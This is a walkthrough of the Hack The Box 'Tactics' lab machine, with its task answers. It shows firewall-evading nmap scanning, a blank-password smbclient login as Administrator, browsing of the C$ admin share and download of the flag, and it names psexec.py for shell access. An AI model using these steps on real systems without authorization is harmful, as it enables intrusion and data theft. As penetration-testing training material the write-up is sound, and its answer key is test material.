#11 Tactics - Starting Point - Hack The Box || Complete Walkthrough

Table of Contents

• Enumeration
• Enumerate using the SMB Client tool
• Foothold
• Foothold the SMB server using the SMB client tool
• Task Answers

Tactics is a Windows server that contains a misconfigured SMB share, which offers two types of attack vectors. One is discoverable and easy to employ. The other involves the installation and deployment of a popular exploitation framework, while dearly effective, comes with its own disadvantages in terms of discoverability. 

In this video we are going to take the right step, knowing the right path and perceiving the consequences of your attack vectors will prove vital to your career.

• We have already learned it from:

Dancing: Starting Point Hack The Box Walkthrough

This walkthrough provides a step-by-step guide to hacking the "Dancing" machine on the Hack The Box platform. It covers the process of gaining initial access, escalating privileges, and ultimately achieving full control over the target machine.

Enumeration

In order to get a general view of the target host, we will begin with an always-popular Nmap scan. However, we will be using a new switch for the scan. 

Instead of the -sV service detection switch, we will be using -Pn. In a real-world environment, you should expect Firewalls to be present, intercepting connections at every step and denying all nonstandard connection requests or scan attempts. During a typical Nmap scan, the Nmap script will perform a form of complex ping scan, which most Firewalls are set to deny automatically, without question. Repeated denials will raise suspicion, and during a typical scan, a lot of the same requests will get denied.

The -Pn flag will skip the host discovery phase and move on straight to other probe types, silencing your active scanning to a degree. However small, this degree might prove the be the lifeline you needed before you even considered actively attacking the host.

• -Pn : Treat all hosts as online -- skip host discovery  
• -sC : Equivalent to --scriot=default

┌──(mrdev㉿mrdev)-[~]

└─$ nmap -sC -Pn 10.129.108.21

Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-25 14:00 IST

Nmap scan report for 10.129.108.21

Host is up (0.37s latency).

Not shown: 997 filtered tcp ports (no-response)

PORT    STATE SERVICE

135/tcp open  msrpc

139/tcp open  netbios-ssn

445/tcp open  microsoft-ds

Host script results:

| smb2-time:

|   date: 2021-12-25T08:41:20

|_  start_date: N/A

| smb2-security-mode:

|   3.1.1:

|_    Message signing enabled but not required

|_clock-skew: 10m41s

Nmap done: 1 IP address (1 host up) scanned in 72.35 seconds

┌──(mrdev㉿mrdev)-[~]

└─$ 

According to the results of the nmap scan, the machine is running the Windows and the Server Message Block service on port 445. We have found our target.

Enumerate using the SMB Client tool

Inherently, SMB (Server Message Block) is a file-sharing protocol, which means that we might extract some useful by-products by exploring it. This can be achieved by using the smbclient tool.

In order to find the appropriate switches for this tool, we can use its help menu, which is accessed by typing the smbclient -h command.

┌──(mrdev㉿mrdev)-[~]

└─$ smbclient -h

Usage: smbclient [-?EgqBVNkPeC] [-?|--help] [--usage] [-R|--name-resolve=NAME-RESOLVE-ORDER]

                [-M|--message=HOST] [-I|--ip-address=IP] [-E|--stderr] [-L|--list=HOST]

                [-m|--max-protocol=LEVEL] [-T|--tar=<c|x>IXFvgbNan] [-D|--directory=DIR]

                [-c|--command=STRING] [-b|--send-buffer=BYTES] [-t|--timeout=SECONDS] [-p|--port=PORT]

                [-g|--grepable] [-q|--quiet] [-B|--browse] [-d|--debuglevel=DEBUGLEVEL]

                [-s|--configfile=CONFIGFILE] [-l|--log-basename=LOGFILEBASE] [-V|--version]

                [--option=name=value] [-O|--socket-options=SOCKETOPTIONS] [-n|--netbiosname=NETBIOSNAME]

                [-W|--workgroup=WORKGROUP] [-i|--scope=SCOPE] [-U|--user=USERNAME] [-N|--no-pass]

                [-k|--kerberos] [-A|--authentication-file=FILE] [-S|--signing=on|off|required]

                [-P|--machine-pass] [-e|--encrypt] [-C|--use-ccache] [--pw-nt-hash] service <password>

This is, however, short and not very descriptive, but it suits our needs for now. Upon exploring the choices, we will settle on this command, in order to list the various available shares ( -L ) and to attempt a login as the Administrator account, which is the high privilege standard account for Windows operating systems. 

Typically, the SMB server will request a password, but since we want to cover all aspects of possible misconfigurations, we can attempt a passwordless login. Simply hitting the Enter key when prompted for the Administrator password will send a blank input to the server. Whether it accepts it or not, we still need to discover.

┌──(mrdev㉿mrdev)-[~]

└─$ smbclient -L 10.129.108.21 -U Administrator

Enter WORKGROUP\Administrator's password:

Sharename       Type      Comment

---------       ----      -------

ADMIN$          Disk      Remote Admin

C$              Disk      Default share

IPC$            IPC       Remote IPC

SMB1 disabled -- no workgroup available

┌──(mrdev㉿mrdev)-[~]

└─$ 

 

Foothold

Foothold the SMB server using the SMB client tool

From here run the below command to get access to a share.

┌──(mrdev㉿mrdev)-[~]

└─$ smbclient \\\\10.129.108.21\\ADMIN$ -U Administrator

Enter WORKGROUP\Administrator's password:

Try "help" to get a list of possible commands.

smb: \>

We got an smb interaction. Run help to check available help.

smb: \> help

?              allinfo        altname        archive        backup

blocksize      cancel         case_sensitive cd             chmod

chown          close          del            deltree        dir

du             echo           exit           get            getfacl

geteas         hardlink       help           history        iosize

lcd            link           lock           lowercase      ls

l              mask           md             mget           mkdir

more           mput           newer          notify         open

posix          posix_encrypt  posix_open     posix_mkdir    posix_rmdir

posix_unlink   posix_whoami   print          prompt         put

pwd            q              queue          quit           readlink

rd             recurse        reget          rename         reput

rm             rmdir          showacls       setea          setmode

scopy          stat           symlink        tar            tarmode

timeout        translate      unlock         volume         vuid

wdel           logon          listconnect    showconnect    tcon

tdis           tid            utimes         logoff         ..

!                                                                

smb: \>

Instead of accessing the ADMIN$ share, we can access the C$ share, which is the file system of the Windows machine.

smb: \> exit

┌──(mrdev㉿mrdev)-[~]

└─$ smbclient \\\\10.129.108.21\\C$ -U Administrator

Enter WORKGROUP\Administrator's password:

Try "help" to get a list of possible commands.

smb: \>

We have access to the file system. From here, we will directly navigate to the standard root flag location on any Hack The Box Windows vulnerable machine. Using the dir command, we discover the flag file present snuggly on our system.

smb: \> dir

$Recycle.Bin                      DHS        0  Wed Apr 21 20:53:49 2021

Config.Msi                        DHS        0  Wed Jul  7 23:34:56 2021

Documents and Settings          DHSrn        0  Wed Apr 21 20:47:12 2021

pagefile.sys                      AHS 738197504 Sat Dec 25 14:08:15 2021

PerfLogs                            D        0  Sat Sep 15 12:49:00 2018

Program Files                      DR        0  Wed Jul  7 23:34:24 2021

Program Files (x86)                 D        0  Wed Jul  7 23:33:38 2021

ProgramData                        DH        0  Wed Apr 21 21:01:48 2021

Recovery                         DHSn        0  Wed Apr 21 20:47:15 2021

System Volume Information         DHS        0  Wed Apr 21 21:04:04 2021

Users                              DR        0  Wed Apr 21 20:53:18 2021

Windows                             D        0  Wed Jul  7 23:35:23 2021

3774463 blocks of size 4096. 1157823 blocks available

smb: \> cd Users\Administrator\Desktop

smb: \Users\Administrator\Desktop\> dir

.                                  DR        0  Thu Apr 22 12:46:03 2021

..                                 DR        0  Thu Apr 22 12:46:03 2021

desktop.ini                       AHS      282  Wed Apr 21 20:53:32 2021

flag.txt                            A       32  Fri Apr 23 15:09:00 2021

3774463 blocks of size 4096. 1157455 blocks available

smb: \Users\Administrator\Desktop\>

In order to retrieve the flag.txt file from the server, we can use the get flag.txt command. This will initialize a download with the output location being our last visited directory on our attacker VM at the point of running the smbclient tool.

smb: \Users\Administrator\Desktop\> get flag.txt

getting file \Users\Administrator\Desktop\flag.txt of size 32 as flag.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)

smb: \Users\Administrator\Desktop\> exit

We can now exit the smbclient command line and read the file we just downloaded using the cat command.

┌──(mrdev㉿mrdev)-[~]

└─$ cat flag.txt

*****************************

You have successfully retrieved the flag, congratulations!

Task Answers

TASK 1: Which Nmap switch can we use to enumerate machines when our packets are otherwise blocked by the Windows firewall?

Ans. -Pn

TASK 2: What does the 3-letter acronym SMB stand for?

Ans. Server Message Block

TASK 3: What port does SMB use to operate at?

Ans. 445

TASK 4: What command-line argument do you give to `smbclient` to list available shares?

Ans. -L

TASK 5: What character at the end of a share name indicates it's an administrative share?

Ans. $

TASK 6: Which Administrative share is accessible on the box that allows users to view the whole file system?

Ans. C$

TASK 7: What command can we use to download the files we find on the SMB Share?

Ans. get

TASK 8: Which tool that is part of the Impacket collection can be used to get an interactive shell on the system?

Ans. psexec.py